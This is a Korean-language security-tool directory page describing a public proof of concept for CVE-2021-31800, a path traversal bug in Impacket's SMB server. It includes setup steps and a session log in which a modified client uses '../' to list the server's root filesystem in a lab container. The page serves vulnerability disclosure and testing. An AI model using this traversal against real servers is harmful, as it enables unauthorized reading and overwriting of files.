Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write — smbserver.py의 경로 순회(path traversal) 취약점으로 인해 공격자가 서버에서 임의의 파일을 읽거나 쓸 수 있습니다. | Kitploit
도구/GitHubGitHub/p0dalirius/cve-2021-31800-impacket-smb-server-arbitrary-file-read-write
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPenetration Testing
GitHubp0dalirius/cve-2021-31800-impacket-smb-server-arbitrary-file-read-write

CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write

smbserver.py의 경로 순회(path traversal) 취약점으로 인해 공격자가 서버에서 임의의 파일을 읽거나 쓸 수 있습니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트
1113년 전아직 검토되지 않음

CVE-2021-31800 - Impacket SMB 서버 임의 파일 읽기/쓰기

  • CVSS 벡터: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
  • CVSS 점수: 9.9 (심각)

설명

smbserver.py에 존재하는 경로 탐색(path traversal) 취약점으로 인해 공격자가 서버의 임의 파일을 읽거나 쓸 수 있습니다.

이 문제에 대한 자세한 설명: https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/

사용법

make를 ./exploit_env/ 디렉토리 내에서 입력하여 익스플로잇 환경을 시작합니다. 그런 다음 수정된 버전의 smbclient.py를 사용하여 경로 탐색을 통해 파일을 임의로 읽거나 쓸 수 있습니다.

그런 다음 ../를 사용하여 파일 시스템을 탐색하고 파일을 읽거나 쓸 수 있습니다! 예시는 다음과 같습니다.

root@kitploit:~
# smbclient.py 192.168.1.27
Impacket v0.9.23.dev1+20210422.174300.cb6d43a6 - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# shares
IPC$
SYSVOL
# use SYSVOL
# ls 
-rw-rw-rw-         10  Sun Jan  8 23:59:59 2023 test.txt
# ls ../
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 sbin
drw-rw-rw-        360  Sun Jan  8 23:59:59 2023 dev
drw-rw-rw-          0  Sun Jan  8 23:59:59 2023 sys
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 media
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 srv
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 opt
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 tmp
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 var
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 lib
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 bin
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 root
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 usr
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 mnt
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 run
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 boot
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 etc
drw-rw-rw-          0  Sun Jan  8 23:59:59 2023 proc
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 lib64
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 home
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 share
-rw-rw-rw-          0  Sun Jan  8 23:59:59 2023 .dockerenv
-rw-rw-rw-        142  Sun Jan  8 23:59:59 2023 entrypoint.sh
#

데모

데모를 위해 make를 ./vulnerable_env/ 디렉토리 내에서 입력하여 취약한 환경을 시작할 수 있습니다.

참고자료

  • https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/
  • 흥미로운 코멘트: https://github.com/fortra/impacket/blob/fea485d2e4a53e9c26c02678237df1fc6621b5f4/impacket/smbserver.py#L16
도구 다운로드